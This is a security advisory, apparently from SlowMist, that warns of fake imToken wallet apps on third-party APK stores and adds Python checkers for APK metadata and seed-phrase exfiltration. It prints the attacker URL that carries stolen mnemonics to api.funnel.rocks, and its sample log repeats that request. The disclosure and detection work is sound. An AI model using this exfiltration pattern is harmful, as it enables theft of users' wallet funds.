Slow Mist: Web3 Fake Wallet Third-Party Source Investigation and Analysis
SlowMist Technology
2023-04-25 08:08
This article is about 1,539 words; reading it takes about 6 minutes.
It is recommended that when using wallets and exchanges, you look for official download channels and verify them from multiple parties.

Background

Web3, built on blockchain technology, is driving the next generation of technological revolution, and more and more people are joining this crypto wave, but Web3 and Web2 are two completely different worlds. The Web3 world is a dark forest full of opportunities and dangers, and the wallet is the entrance and pass into it.

When you explore the many blockchain applications and websites of the Web3 world through your wallet, you will find that every application on a public chain uses the wallet to "log in". This differs from the traditional login of the Web2 world, where accounts are not interoperable between applications. In Web3, all applications log you in through the same wallet; instead of a "Log in with Wallet" button, the interface shows "Connect Wallet". The wallet is your only passport in the Web3 world.

As the saying goes, tall buildings cast long shadows. In such a hot Web3 world, wallets, as the entry-level application, are naturally targeted by the black and gray industry.

Website analysis

Given the many download channels, let's take apkcombo as an example today. Apkcombo is a third-party application market. According to its own statement, most of the applications it offers come from other official application stores, but is that true?

Let's first look at how large apkcombo's traffic is.

According to the statistics site similarweb, the apkcombo site ranks:

Global rank: 1,809

National rank: 7,370

Category ranking: 168

We can see that its influence and traffic are very large.

By default it offers a Chrome APK-download extension, and we found that this extension has more than 100,000 users:

So back to the wallet direction in the Web3 field that we are concerned about, how safe is the wallet application that users download from here?

Let's take the well-known imToken wallet as an example. The official download path of Google Play is:

https://play.google.com/store/apps/details?id=im.token.app

Because many phones do not support Google Play, or because of network problems, many people download Google Play applications from here instead.

The download path of the apkcombo mirror station is:

https://apkcombo.com/downloader/#package=im.token.app

From the picture above, we can see that the version offered by apkcombo is 24.9.11. imToken confirmed that this version does not exist! It is also confirmed to be the version number most commonly carried by fake imToken wallets currently on the market.

At the time of writing, the latest imToken wallet is version 2.11.3. The fake wallet's version number is far higher, clearly chosen to pose as the newest release.

As shown in the picture below, this fake wallet version shows a large download volume on apkcombo; that figure is most likely crawled from Google Play. For security reasons, we feel it is necessary to disclose the source of this malicious app to prevent more people from downloading it.

At the same time, we found similar download sites, such as uptodown:

Download link: https://imtoken.br.uptodown.com/android
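The two signals described above (a version number higher than anything the vendor has shipped, and a download host that is not the vendor's official channel) can be checked mechanically before an APK is installed. The following is an added example, not SlowMist's or imToken's own tooling: the package id im.token.app, the official version 2.11.3, the mirrored version 24.9.11 and the official hosts (play.google.com, token.im) are taken from this article, while the signing-certificate fingerprint is an operator-supplied value, left unconfigured here, that must come from the vendor.

```python
"""Sanity-check the metadata of an APK obtained from a third-party store.

Added example, not part of the SlowMist write-up or imToken's tooling. Version
numbers, package id and official hosts come from the article; the vendor's
signing-certificate fingerprint is NOT on the page and must be supplied by the
operator (it stays None here, which the check reports as "not configured").
"""
from dataclasses import dataclass
from typing import Optional

PACKAGE = "im.token.app"
OFFICIAL_LATEST = "2.11.3"                        # latest release per the article
OFFICIAL_HOSTS = {"play.google.com", "token.im"}  # official channels per the article
OFFICIAL_CERT_SHA256: Optional[str] = None        # placeholder: vendor-published value


def parse_version(v: str) -> tuple:
    """'v2.11.3' -> (2, 11, 3); non-numeric components are treated as 0."""
    parts = []
    for component in v.strip().lstrip("vV").split("."):
        digits = "".join(ch for ch in component if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


@dataclass
class ApkMetadata:
    package: str       # from the APK manifest
    version: str       # versionName from the manifest / store listing
    source_host: str   # host the file was downloaded from
    cert_sha256: str   # signer fingerprint, e.g. from `apksigner verify --print-certs`


def assess(meta: ApkMetadata, official_cert_sha256: Optional[str] = OFFICIAL_CERT_SHA256) -> list:
    """Return the reasons this APK should not be trusted (empty list if none)."""
    reasons = []
    if meta.package != PACKAGE:
        reasons.append(f"package id {meta.package!r} is not {PACKAGE!r}")
    if parse_version(meta.version) > parse_version(OFFICIAL_LATEST):
        # A build newer than the vendor's latest release cannot be genuine; the
        # inflated number is there to look like an upgrade.
        reasons.append(f"version {meta.version} is newer than the official latest {OFFICIAL_LATEST}")
    if meta.source_host not in OFFICIAL_HOSTS:
        reasons.append(f"downloaded from non-official host {meta.source_host}")
    if official_cert_sha256 is None:
        reasons.append("vendor signing-certificate fingerprint not configured; signature cannot be verified")
    elif meta.cert_sha256.replace(":", "").lower() != official_cert_sha256.replace(":", "").lower():
        reasons.append("signing certificate does not match the vendor's published fingerprint")
    return reasons


if __name__ == "__main__":
    # Constructed fingerprints: the real values are not on the page.
    mirrored = ApkMetadata(PACKAGE, "24.9.11", "apkcombo.com", "11" * 32)
    for reason in assess(mirrored, official_cert_sha256="aa" * 32):
        print("REJECT:", reason)
```

The version comparison is deliberately strict: anything above the vendor's current release is treated as fake rather than "pre-release", because the mirror is not a channel through which a vendor ships early builds. The certificate check is the decisive one once the fingerprint is configured; a repackaged APK cannot carry the vendor's signature.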

Wallet analysis

We have analyzed many cases of fake wallets before, such as: 2021-11-24 We disclosed: "SlowMist: Fake wallet apps have caused tens of thousands of people to be stolen, with losses of up to 1.3 billion U.S. dollars", so I won't go into details here.

We only analyze the fake wallet version 24.9.11 provided by apkcombo. When a wallet is created or a mnemonic is imported on the start screen, the fake wallet sends the mnemonic and other information to the server of the phishing site, as shown in the figure below:

According to the reversed APK code and analysis of the actual traffic, the mnemonic is sent as follows:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<mnemonic>

As the picture below shows, the earliest certificate for "api.funnel.rocks" appeared on 2022-06-03, which is approximately when the attack started:
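Because the fake wallet sends the seed phrase as a plain query-string parameter, the theft is visible in any proxy or egress log that records full URLs. The following is an added detection example, not SlowMist's code: it flags requests to the exfiltration host named in this article and, as a structural heuristic (an assumption, not a BIP-39 wordlist check), any query parameter whose value is a 12/15/18/21/24-word lowercase phrase. The log lines are constructed for the example.

```python
"""Flag HTTP requests that look like seed-phrase exfiltration.

Added example, not SlowMist's code. The only indicator taken from the
write-up is the api.funnel.rocks URL pattern; the log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Indicator from the write-up: the fake imToken build posted mnemonics here.
KNOWN_EXFIL_HOSTS = {"api.funnel.rocks"}

# BIP-39 phrases are 12/15/18/21/24 lowercase words of 3-8 letters. This is a
# structural heuristic (assumption), not a wordlist check, so it also catches
# phrases sent to hosts that are not yet on the block list.
MNEMONIC_LENGTHS = {12, 15, 18, 21, 24}
WORD_RE = re.compile(r"^[a-z]{3,8}$")


def looks_like_mnemonic(value: str) -> bool:
    words = value.split()
    return len(words) in MNEMONIC_LENGTHS and all(WORD_RE.match(w) for w in words)


def inspect_request(url: str) -> list:
    """Return the reasons a request is suspicious (empty list if clean)."""
    parts = urlsplit(url)
    reasons = []
    if parts.hostname in KNOWN_EXFIL_HOSTS:
        reasons.append(f"known exfiltration host {parts.hostname}")
    # parse_qs decodes '+' and '%20' to spaces, so the word split below works
    # for both encodings of a phrase.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            if looks_like_mnemonic(v):
                reasons.append(f"query parameter {name!r} carries a {len(v.split())}-word mnemonic-like phrase")
    return reasons


# Constructed proxy log: "<timestamp> <client> <method> <url>"
SAMPLE_LOG = """\
2023-04-20T10:00:01Z 10.0.0.5 GET https://token.im/
2023-04-20T10:00:02Z 10.0.0.5 GET https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=abandon+ability+able+about+above+absent+absorb+abstract+absurd+abuse+access+accident
2023-04-20T10:00:03Z 10.0.0.7 GET https://example-cdn.test/sync?phrase=zoo%20zone%20wrong%20write%20wrist%20wrap%20worth%20world%20word%20wool%20wisdom%20wire%20wink%20wing%20wild
2023-04-20T10:00:04Z 10.0.0.8 GET https://api.example.test/search?q=how+to+back+up+a+wallet
"""


def scan_log(text: str) -> list:
    """Return (client, reasons) for every log line that trips a rule."""
    hits = []
    for line in text.splitlines():
        fields = line.split(maxsplit=3)
        if len(fields) < 4:
            continue
        reasons = inspect_request(fields[3])
        if reasons:
            hits.append((fields[1], reasons))
    return hits


if __name__ == "__main__":
    for client, reasons in scan_log(SAMPLE_LOG):
        print(client, "->", "; ".join(reasons))
```

The host rule catches this campaign; the phrase heuristic is what keeps the check useful after the attackers rotate domains. Any hit from a device is a reason to treat every wallet on that device as compromised, which matches the advice in the summary below to move assets and uninstall the app.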

Summary

At present, this kind of scam is not only active but tends to expand in scope, and new victims are deceived every day. As the weakest link in the security system, users should remain skeptical and strengthen their security and risk awareness. When using wallets and exchanges, look for the official download channel and verify it from multiple parties; if your wallet came from one of the mirror sites above, transfer your assets and uninstall the software as soon as possible, and verify through the official channel if necessary.

At the same time, if you need to use a wallet, please make sure to use the following official websites of mainstream wallet apps:

1/ imToken wallet: https://token.im/

2/ TokenPocket wallet: https://www.tokenpocket.pro/

3/ TronLink wallet: https://www.tronlink.org/

4/ Bitpie wallet: https://bitpie.com/

5/ MetaMask wallet: https://metamask.io/

6/ Trust Wallet: https://trustwallet.com/

Please continue to follow the SlowMist security team; more Web3 security risk analyses and warnings are on the way.

Acknowledgments: thanks to imToken for the official verification support provided during the tracing process.

Due to confidentiality and privacy, this article is just the tip of the iceberg. SlowMist suggests that users strengthen their understanding of security knowledge and further improve their ability to identify phishing attacks, so as to avoid such attacks. For more security knowledge, we recommend reading SlowMist's "Blockchain Dark Forest Self-Help Manual".
